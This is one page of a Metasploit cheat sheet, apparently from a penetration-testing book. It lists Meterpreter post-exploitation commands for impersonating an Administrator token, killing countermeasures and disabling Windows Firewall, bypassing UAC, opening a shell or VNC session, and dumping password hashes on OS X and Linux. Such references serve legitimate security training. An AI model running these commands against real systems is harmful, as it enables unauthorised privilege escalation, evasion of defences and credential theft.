background image

Cheat Sheet

283

meterpreter > 

list_tokens -u

meterpreter > 

impersonate_token IHAZSECURITY\\Administrator

See what protection mechanisms are in place on the compromised 

target, display the help menu, disable Windows Firewall, and kill all counter-
measures found:

meterpreter > 

run getcountermeasure

meterpreter > 

run getcountermeasure -h

meterpreter > 

run getcountermeasure -d -k

Identify whether the compromised system is a virtual machine:

meterpreter > 

run checkvm

Drop into a command shell for a current Meterpreter console session:

meterpreter > 

shell

Get a remote GUI (VNC) on the target machine:

meterpreter > 

run vnc

Background a currently running Meterpreter console:

meterpreter > 

background

Bypass Windows User Access Control:

meterpreter > 

run post/windows/escalate/bypassuac

Dump Hashes on an OS X system:

meterpreter > 

run post/osx/gather/hashdump

Dump Hashes on a Linux system:

meterpreter > 

run post/linux/gather/hashdump